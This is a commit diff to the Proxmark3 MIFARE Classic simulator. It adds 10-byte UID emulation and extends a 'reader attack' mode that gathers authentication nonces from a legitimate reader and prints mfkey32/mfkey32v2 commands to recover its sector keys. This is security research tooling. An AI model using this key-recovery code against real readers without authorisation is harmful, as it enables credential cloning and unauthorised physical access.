update hf mf sim x attack mode - start 10byte uid..

..support  (some from @iceman1001)
(sim reader attack currently testing std mfkey32 vs mfkey32_moebius
version...)  possibly will remove one later.
This commit is contained in:
marshmellow42 2016-06-24 01:31:27 -04:00
parent 7314995a5a
commit c872d8c177
9 changed files with 513 additions and 198 deletions

View file

@ -15,12 +15,13 @@
#include "util.h" #include "util.h"
#include "string.h" #include "string.h"
#include "cmd.h" #include "cmd.h"
#include "iso14443crc.h" #include "iso14443crc.h"
#include "iso14443a.h" #include "iso14443a.h"
#include "crapto1.h" #include "crapto1.h"
#include "mifareutil.h" #include "mifareutil.h"
#include "BigBuf.h" #include "BigBuf.h"
#include "protocols.h"
static uint32_t iso14a_timeout; static uint32_t iso14a_timeout;
int rsamples = 0; int rsamples = 0;
uint8_t trigger = 0; uint8_t trigger = 0;
@ -2324,14 +2325,17 @@ typedef struct {
* *
*@param flags : *@param flags :
* FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK * FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
* 4B_FLAG_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that * FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
* 7B_FLAG_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that * FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
* FLAG_10B_UID_IN_DATA - use 10-byte UID in the data-section not finished
* FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later * FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later
*@param exitAfterNReads, exit simulation after n blocks have been read, 0 is inifite *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ...
* (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
*/ */
void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain) void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain)
{ {
int cardSTATE = MFEMUL_NOFIELD; int cardSTATE = MFEMUL_NOFIELD;
int _UID_LEN = 0; // 4, 7, 10
int _7BUID = 0; int _7BUID = 0;
int vHf = 0; // in mV int vHf = 0; // in mV
int res; int res;
@ -2359,24 +2363,31 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!! uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
uint8_t rUIDBCC3[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
uint8_t rSAK[] = {0x08, 0xb6, 0xdd}; uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
uint8_t rSAK1[] = {0x04, 0xda, 0x17}; uint8_t rSAK1[] = {0x04, 0xda, 0x17};
uint8_t rSAK2[] = {0x04, 0xda, 0x17}; //need to look up
uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04}; uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00}; uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
//Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2 //Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
// This can be used in a reader-only attack. // This will be used in the reader-only attack.
// (it can also be retrieved via 'hf 14a list', but hey...
//allow collecting up to 8 sets of nonces to allow recovery of 8 keys
//allow collecting up to 4 sets of nonces to allow recovery of 4 keys (2 keyA & 2 keyB) #define ATTACK_KEY_COUNT 8
// must be set in multiples of 2 (for 1 keyA and 1 keyB) nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types
#define ATTACK_KEY_COUNT 4
nonces_t ar_nr_resp[ATTACK_KEY_COUNT];
memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp)); memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
uint8_t ar_nr_collected[ATTACK_KEY_COUNT]; uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2];
memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected)); memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
bool collectMoebius = false;
uint8_t nonce1_count = 0;
uint8_t nonce2_count = 0;
uint8_t moebius_n_count = 0;
uint8_t mM = 0; //moebius_modifier for collection storage
// Authenticate response - nonce // Authenticate response - nonce
uint32_t nonce = bytes_to_num(rAUTH_NT, 4); uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
@ -2388,45 +2399,98 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
// 4B uid comes from data-portion of packet // 4B uid comes from data-portion of packet
memcpy(rUIDBCC1,datain,4); memcpy(rUIDBCC1,datain,4);
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
_UID_LEN = 4;
} else if (flags & FLAG_7B_UID_IN_DATA) { } else if (flags & FLAG_7B_UID_IN_DATA) {
// 7B uid comes from data-portion of packet // 7B uid comes from data-portion of packet
memcpy(&rUIDBCC1[1],datain,3); memcpy(&rUIDBCC1[1],datain,3);
memcpy(rUIDBCC2, datain+3, 4); memcpy(rUIDBCC2, datain+3, 4);
_7BUID = true; _7BUID = true;
_UID_LEN = 7;
} else if (flags & FLAG_10B_UID_IN_DATA) {
memcpy(&rUIDBCC1[1], datain, 3);
memcpy(&rUIDBCC2[1], datain+3, 3);
memcpy( rUIDBCC3, datain+6, 4);
_UID_LEN = 10;
} else { } else {
// get UID from emul memory // get UID from emul memory - guess at length
emlGetMemBt(receivedCmd, 7, 1); emlGetMemBt(receivedCmd, 7, 1);
_7BUID = !(receivedCmd[0] == 0x00); _7BUID = !(receivedCmd[0] == 0x00);
if (!_7BUID) { // ---------- 4BUID if (!_7BUID) { // ---------- 4BUID
emlGetMemBt(rUIDBCC1, 0, 4); emlGetMemBt(rUIDBCC1, 0, 4);
_UID_LEN = 4;
} else { // ---------- 7BUID } else { // ---------- 7BUID
emlGetMemBt(&rUIDBCC1[1], 0, 3); emlGetMemBt(&rUIDBCC1[1], 0, 3);
emlGetMemBt(rUIDBCC2, 3, 4); emlGetMemBt(rUIDBCC2, 3, 4);
_UID_LEN = 7;
} }
} }
/* switch (_UID_LEN) {
* Regardless of what method was used to set the UID, set fifth byte and modify case 4:
* the ATQA for 4 or 7-byte UID // save CUID
*/ cuid = bytes_to_num(rUIDBCC1, 4);
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; // BCC
if (_7BUID) { rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
rATQA[0] = 0x44; if (MF_DBGLEVEL >= 2) {
rUIDBCC1[0] = 0x88; Dbprintf("4B UID: %02x%02x%02x%02x",
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; rUIDBCC1[0],
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3]; rUIDBCC1[1],
} rUIDBCC1[2],
rUIDBCC1[3]
);
}
break;
case 7:
rATQA[0] |= 0x40;
// save CUID
cuid = bytes_to_num(rUIDBCC2, 4);
// CascadeTag, CT
rUIDBCC1[0] = 0x88;
// BCC
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
if (MF_DBGLEVEL >= 2) {
Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x",
rUIDBCC1[1],
rUIDBCC1[2],
rUIDBCC1[3],
rUIDBCC2[0],
rUIDBCC2[1],
rUIDBCC2[2],
rUIDBCC2[3]
);
}
break;
case 10:
rATQA[0] |= 0x80;
//sak_10[0] &= 0xFB;
// save CUID
cuid = bytes_to_num(rUIDBCC3, 4);
// CascadeTag, CT
rUIDBCC1[0] = 0x88;
rUIDBCC2[0] = 0x88;
// BCC
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3];
if (MF_DBGLEVEL >= 1) { if (MF_DBGLEVEL >= 2) {
if (!_7BUID) { Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x",
Dbprintf("4B UID: %02x%02x%02x%02x", rUIDBCC1[1],
rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]); rUIDBCC1[2],
} else { rUIDBCC1[3],
Dbprintf("7B UID: (%02x)%02x%02x%02x%02x%02x%02x%02x", rUIDBCC2[1],
rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3], rUIDBCC2[2],
rUIDBCC2[0], rUIDBCC2[1] ,rUIDBCC2[2], rUIDBCC2[3]); rUIDBCC2[3],
} rUIDBCC3[0],
rUIDBCC3[1],
rUIDBCC3[2],
rUIDBCC3[3]
);
}
break;
default:
break;
} }
// We need to listen to the high-frequency, peak-detected path. // We need to listen to the high-frequency, peak-detected path.
@ -2439,9 +2503,8 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
clear_trace(); clear_trace();
set_tracing(TRUE); set_tracing(TRUE);
bool finished = FALSE; bool finished = FALSE;
while (!BUTTON_PRESS() && !finished) { while (!BUTTON_PRESS() && !finished && !usb_poll_validate_length()) {
WDT_HIT(); WDT_HIT();
// find reader field // find reader field
@ -2452,10 +2515,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
LED_A_ON(); LED_A_ON();
} }
} }
if(cardSTATE == MFEMUL_NOFIELD) continue; if (cardSTATE == MFEMUL_NOFIELD) continue;
//Now, get data //Now, get data
res = EmGetCmd(receivedCmd, &len, receivedCmd_par); res = EmGetCmd(receivedCmd, &len, receivedCmd_par);
if (res == 2) { //Field is off! if (res == 2) { //Field is off!
cardSTATE = MFEMUL_NOFIELD; cardSTATE = MFEMUL_NOFIELD;
@ -2466,9 +2528,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
} }
// REQ or WUP request in ANY state and WUP in HALTED state // REQ or WUP request in ANY state and WUP in HALTED state
if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) { if (len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) {
selTimer = GetTickCount(); selTimer = GetTickCount();
EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52)); EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == ISO14443A_CMD_WUPA));
cardSTATE = MFEMUL_SELECT1; cardSTATE = MFEMUL_SELECT1;
// init crypto block // init crypto block
@ -2499,21 +2561,54 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]); Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]);
} }
// select card // select card
// check correct sak values... (marshmellow)
if (len == 9 && if (len == 9 &&
(receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) { (receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
EmSendCmd(_7BUID?rSAK1:rSAK, _7BUID?sizeof(rSAK1):sizeof(rSAK)); switch(_UID_LEN) {
cuid = bytes_to_num(rUIDBCC1, 4); case 4:
if (!_7BUID) { cardSTATE = MFEMUL_WORK;
cardSTATE = MFEMUL_WORK; LED_B_ON();
LED_B_ON(); if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer); EmSendCmd(rSAK, sizeof(rSAK));
break; break;
} else { case 7:
cardSTATE = MFEMUL_SELECT2; cardSTATE = MFEMUL_SELECT2;
EmSendCmd(rSAK1, sizeof(rSAK1));
break;
case 10:
cardSTATE = MFEMUL_SELECT2;
EmSendCmd(rSAK2, sizeof(rSAK2));
break;
default:break;
} }
} else {
cardSTATE_TO_IDLE();
} }
break; break;
} }
case MFEMUL_SELECT3:{
if (!len) {
LogTrace(Uart.output, Uart.len, Uart.startTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.endTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, TRUE);
break;
}
if (len == 2 && (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && receivedCmd[1] == 0x20)) {
EmSendCmd(rUIDBCC3, sizeof(rUIDBCC3));
break;
}
if (len == 9 &&
(receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 &&
receivedCmd[1] == 0x70 &&
memcmp(&receivedCmd[2], rUIDBCC3, 4) == 0) ) {
EmSendCmd(rSAK2, sizeof(rSAK2));
cardSTATE = MFEMUL_WORK;
LED_B_ON();
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol3 time: %d", GetTickCount() - selTimer);
break;
}
cardSTATE_TO_IDLE();
break;
}
case MFEMUL_AUTH1:{ case MFEMUL_AUTH1:{
if( len != 8) if( len != 8)
{ {
@ -2522,43 +2617,67 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
break; break;
} }
uint32_t ar = bytes_to_num(receivedCmd, 4); uint32_t nr = bytes_to_num(receivedCmd, 4);
uint32_t nr = bytes_to_num(&receivedCmd[4], 4); uint32_t ar = bytes_to_num(&receivedCmd[4], 4);
//Collect AR/NR per key/sector //Collect AR/NR per keytype & sector
if(flags & FLAG_NR_AR_ATTACK) { if(flags & FLAG_NR_AR_ATTACK) {
for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) { for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
if(cardAUTHKEY > 0 && i < (ATTACK_KEY_COUNT/2) ) { if ( ar_nr_collected[i+mM]==0 || (cardAUTHSC == ar_nr_resp[i+mM].sector && cardAUTHKEY == ar_nr_resp[i+mM].keytype && ar_nr_collected[i+mM] > 0) ) {
i=ATTACK_KEY_COUNT/2; //keyB skip to keyB // if first auth for sector, or matches sector and keytype of previous auth
} else if (cardAUTHKEY == 0 && i == ATTACK_KEY_COUNT/2) { if (ar_nr_collected[i+mM] < 2) {
break; //should not get here - quit // if we haven't already collected 2 nonces for this sector
} if (ar_nr_resp[ar_nr_collected[i+mM]].ar != ar) {
// if first auth for sector, or matches sector of previous auth // Avoid duplicates... probably not necessary, ar should vary.
if ( ar_nr_collected[i]==0 || (cardAUTHSC == ar_nr_resp[i].sector && ar_nr_collected[i] > 0) ) { if (ar_nr_collected[i+mM]==0) {
if(ar_nr_collected[i] < 2) { // first nonce collect
if(ar_nr_resp[ar_nr_collected[i]].ar != ar) ar_nr_resp[i+mM].cuid = cuid;
{// Avoid duplicates... probably not necessary, ar should vary. ar_nr_resp[i+mM].sector = cardAUTHSC;
if (ar_nr_collected[i]==0) { ar_nr_resp[i+mM].keytype = cardAUTHKEY;
ar_nr_resp[i].cuid = cuid; ar_nr_resp[i+mM].nonce = nonce;
ar_nr_resp[i].sector = cardAUTHSC; ar_nr_resp[i+mM].nr = nr;
ar_nr_resp[i].nonce = nonce; ar_nr_resp[i+mM].ar = ar;
ar_nr_resp[i].ar = ar; nonce1_count++;
ar_nr_resp[i].nr = nr; //add this nonce to first moebius nonce
} else { ar_nr_resp[i+ATTACK_KEY_COUNT].cuid = cuid;
ar_nr_resp[i].ar2 = ar; ar_nr_resp[i+ATTACK_KEY_COUNT].sector = cardAUTHSC;
ar_nr_resp[i].nr2 = nr; ar_nr_resp[i+ATTACK_KEY_COUNT].keytype = cardAUTHKEY;
ar_nr_resp[i+ATTACK_KEY_COUNT].nonce = nonce;
ar_nr_resp[i+ATTACK_KEY_COUNT].nr = nr;
ar_nr_resp[i+ATTACK_KEY_COUNT].ar = ar;
ar_nr_collected[i+ATTACK_KEY_COUNT]++;
} else { //second nonce collect (std and moebius)
ar_nr_resp[i+mM].nonce2 = nonce;
ar_nr_resp[i+mM].nr2 = nr;
ar_nr_resp[i+mM].ar2 = ar;
if (!collectMoebius) {
nonce2_count++;
//check if this was the last second nonce we need for std attack
if ( nonce2_count == nonce1_count ) {
//done collecting std test switch to moebius
collectMoebius = true;
mM = ATTACK_KEY_COUNT;
nonce = nonce*7;
}
} else {
moebius_n_count++;
//if we've collected all the nonces we need - finish.
if (nonce1_count == moebius_n_count) finished = true;
}
} }
ar_nr_collected[i]++; ar_nr_collected[i+mM]++;
break; break;
} }
} else { //already collected 2 nonces for sector - reader looping? - quit
//finished = true;
} }
} }
} }
} }
// --- crypto // --- crypto
crypto1_word(pcs, ar , 1); crypto1_word(pcs, nr , 1);
cardRr = nr ^ crypto1_word(pcs, 0, 0); cardRr = ar ^ crypto1_word(pcs, 0, 0);
// test if auth OK // test if auth OK
if (cardRr != prng_successor(nonce, 64)){ if (cardRr != prng_successor(nonce, 64)){
@ -2600,11 +2719,19 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
// select 2 card // select 2 card
if (len == 9 && if (len == 9 &&
(receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) { (receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
//which sak now? (marshmellow)
EmSendCmd(rSAK, sizeof(rSAK)); EmSendCmd(rSAK, sizeof(rSAK));
cuid = bytes_to_num(rUIDBCC2, 4); switch(_UID_LEN) {
cardSTATE = MFEMUL_WORK; case 7:
LED_B_ON(); cardSTATE = MFEMUL_WORK;
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer); LED_B_ON();
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
break;
case 10:
cardSTATE = MFEMUL_SELECT3;
break;
default:break;
}
break; break;
} }
@ -2632,11 +2759,20 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
} }
if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) { if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
if (receivedCmd[1] >= 16 * 4) {
//is this the correct response to an auth on a out of range block? marshmellow
EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
if (MF_DBGLEVEL >= 2) Dbprintf("Reader tried to operate (0x%02x) on out of range block: %d (0x%02x), nacking",receivedCmd[0],receivedCmd[1],receivedCmd[1]);
break;
}
authTimer = GetTickCount(); authTimer = GetTickCount();
cardAUTHSC = receivedCmd[1] / 4; // received block num cardAUTHSC = receivedCmd[1] / 4; // received block num
cardAUTHKEY = receivedCmd[0] - 0x60; cardAUTHKEY = receivedCmd[0] - 0x60;
crypto1_destroy(pcs);//Added by martin crypto1_destroy(pcs);//Added by martin
crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY)); crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
//uint64_t key=emlGetKey(cardAUTHSC, cardAUTHKEY);
//Dbprintf("key: %04x%08x",(uint32_t)(key>>32)&0xFFFF,(uint32_t)(key&0xFFFFFFFF));
if (!encrypted_data) { // first authentication if (!encrypted_data) { // first authentication
if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY ); if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY );
@ -2826,19 +2962,33 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x", Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x",
ar_nr_resp[i].cuid, //UID ar_nr_resp[i].cuid, //UID
ar_nr_resp[i].nonce, //NT ar_nr_resp[i].nonce, //NT
ar_nr_resp[i].ar, //AR1
ar_nr_resp[i].nr, //NR1 ar_nr_resp[i].nr, //NR1
ar_nr_resp[i].ar2, //AR2 ar_nr_resp[i].ar, //AR1
ar_nr_resp[i].nr2 //NR2 ar_nr_resp[i].nr2, //NR2
ar_nr_resp[i].ar2 //AR2
); );
} }
} }
for ( uint8_t i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT*2; i++) {
if (ar_nr_collected[i] == 2) {
Dbprintf("Collected two pairs of AR/NR which can be used to extract %s from reader for sector %d:", (i<ATTACK_KEY_COUNT/2) ? "keyA" : "keyB", ar_nr_resp[i].sector);
Dbprintf("../tools/mfkey/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
ar_nr_resp[i].cuid, //UID
ar_nr_resp[i].nonce, //NT
ar_nr_resp[i].nr, //NR1
ar_nr_resp[i].ar, //AR1
ar_nr_resp[i].nonce2,//NT2
ar_nr_resp[i].nr2, //NR2
ar_nr_resp[i].ar2 //AR2
);
}
}
} }
if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen()); if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen());
if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK
{ {
//May just aswell send the collected ar_nr in the response aswell //Send the collected ar_nr in the response
cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp)); cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp));
} }

View file

@ -42,14 +42,15 @@ extern int MF_DBGLEVEL;
#define MFEMUL_IDLE 1 #define MFEMUL_IDLE 1
#define MFEMUL_SELECT1 2 #define MFEMUL_SELECT1 2
#define MFEMUL_SELECT2 3 #define MFEMUL_SELECT2 3
#define MFEMUL_AUTH1 4 #define MFEMUL_SELECT3 4
#define MFEMUL_AUTH2 5 #define MFEMUL_AUTH1 5
#define MFEMUL_WORK 6 #define MFEMUL_AUTH2 6
#define MFEMUL_WRITEBL2 7 #define MFEMUL_WORK 7
#define MFEMUL_INTREG_INC 8 #define MFEMUL_WRITEBL2 8
#define MFEMUL_INTREG_DEC 9 #define MFEMUL_INTREG_INC 9
#define MFEMUL_INTREG_REST 10 #define MFEMUL_INTREG_DEC 10
#define MFEMUL_HALTED 11 #define MFEMUL_INTREG_REST 11
#define MFEMUL_HALTED 12
#define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF(); #define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF();

View file

@ -1016,64 +1016,81 @@ int CmdHF14AMfChk(const char *Cmd)
return 0; return 0;
} }
int usage_hf14_mf1ksim(void){
PrintAndLog("Usage: hf mf sim [h] u <uid (8,14 hex symbols)> n <numreads> i x");
PrintAndLog("options:");
PrintAndLog(" h this help");
PrintAndLog(" u (Optional) UID 4,7 bytes. If not specified, the UID 4b from emulator memory will be used");
PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");
PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");
PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");
PrintAndLog(" e (Optional) set keys found from 'reader attack' to emulator memory");
PrintAndLog("samples:");
PrintAndLog(" hf mf sim u 0a0a0a0a");
PrintAndLog(" hf mf sim u 11223344556677");
//PrintAndLog(" hf mf sim u 112233445566778899AA");
return 0;
}
int CmdHF14AMf1kSim(const char *Cmd) int CmdHF14AMf1kSim(const char *Cmd)
{ {
uint8_t uid[7] = {0, 0, 0, 0, 0, 0, 0}; #define ATTACK_KEY_COUNT 8
uint8_t uid[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
uint8_t exitAfterNReads = 0; uint8_t exitAfterNReads = 0;
uint8_t flags = 0; uint8_t flags = 0;
int uidlen = 0;
uint8_t cmdp = param_getchar(Cmd, 0);
if (cmdp == 'h' || cmdp == 'H') {
PrintAndLog("Usage: hf mf sim u <uid (8 hex symbols)> n <numreads> i x");
PrintAndLog(" h this help");
PrintAndLog(" u (Optional) UID. If not specified, the UID from emulator memory will be used");
PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");
PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");
PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");
PrintAndLog("");
PrintAndLog(" sample: hf mf sim u 0a0a0a0a ");
return 0;
}
uint8_t pnr = 0; uint8_t pnr = 0;
if (param_getchar(Cmd, pnr) == 'u') { bool setEmulatorMem = false;
if(param_gethex(Cmd, pnr+1, uid, 8) == 0)
{ char cmdp = param_getchar(Cmd, pnr);
flags |= FLAG_4B_UID_IN_DATA; // UID from packet
} else if(param_gethex(Cmd,pnr+1,uid,14) == 0) { if (cmdp == 'h' || cmdp == 'H') return usage_hf14_mf1ksim();
flags |= FLAG_7B_UID_IN_DATA;// UID from packet
} else { if (cmdp == 'u' || cmdp == 'U') {
PrintAndLog("UID, if specified, must include 8 or 14 HEX symbols"); param_gethex_ex(Cmd, pnr+1, uid, &uidlen);
return 1; switch(uidlen){
//case 20: flags = FLAG_10B_UID_IN_DATA; break; //not complete
case 14: flags = FLAG_7B_UID_IN_DATA; break;
case 8: flags = FLAG_4B_UID_IN_DATA; break;
default: return usage_hf14_mf1ksim();
} }
pnr +=2; pnr +=2;
} }
if (param_getchar(Cmd, pnr) == 'n') {
exitAfterNReads = param_get8(Cmd,pnr+1); cmdp = param_getchar(Cmd, pnr);
if (cmdp == 'n' || cmdp == 'N') {
exitAfterNReads = param_get8(Cmd, pnr+1);
pnr += 2; pnr += 2;
} }
if (param_getchar(Cmd, pnr) == 'i' ) {
//Using a flag to signal interactiveness, least significant bit cmdp = param_getchar(Cmd, pnr);
if (cmdp == 'i' || cmdp == 'I' ) {
flags |= FLAG_INTERACTIVE; flags |= FLAG_INTERACTIVE;
pnr++; pnr++;
} }
if (param_getchar(Cmd, pnr) == 'x' ) { cmdp = param_getchar(Cmd, pnr);
//Using a flag to signal interactiveness, least significant bit if (cmdp == 'x' || cmdp == 'X') {
flags |= FLAG_NR_AR_ATTACK; flags |= FLAG_NR_AR_ATTACK;
} }
cmdp = param_getchar(Cmd, pnr);
if (cmdp == 'e' || cmdp == 'E') {
setEmulatorMem = true;
}
PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ", PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ",
flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4): flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4):
flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A" flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A"
, exitAfterNReads, flags,flags); , exitAfterNReads, flags,flags);
UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}}; UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}};
memcpy(c.d.asBytes, uid, sizeof(uid)); memcpy(c.d.asBytes, uid, sizeof(uid));
clearCommandBuffer();
SendCommand(&c); SendCommand(&c);
if(flags & FLAG_INTERACTIVE) if(flags & FLAG_INTERACTIVE) {
{
UsbCommand resp; UsbCommand resp;
PrintAndLog("Press pm3-button to abort simulation"); PrintAndLog("Press pm3-button to abort simulation");
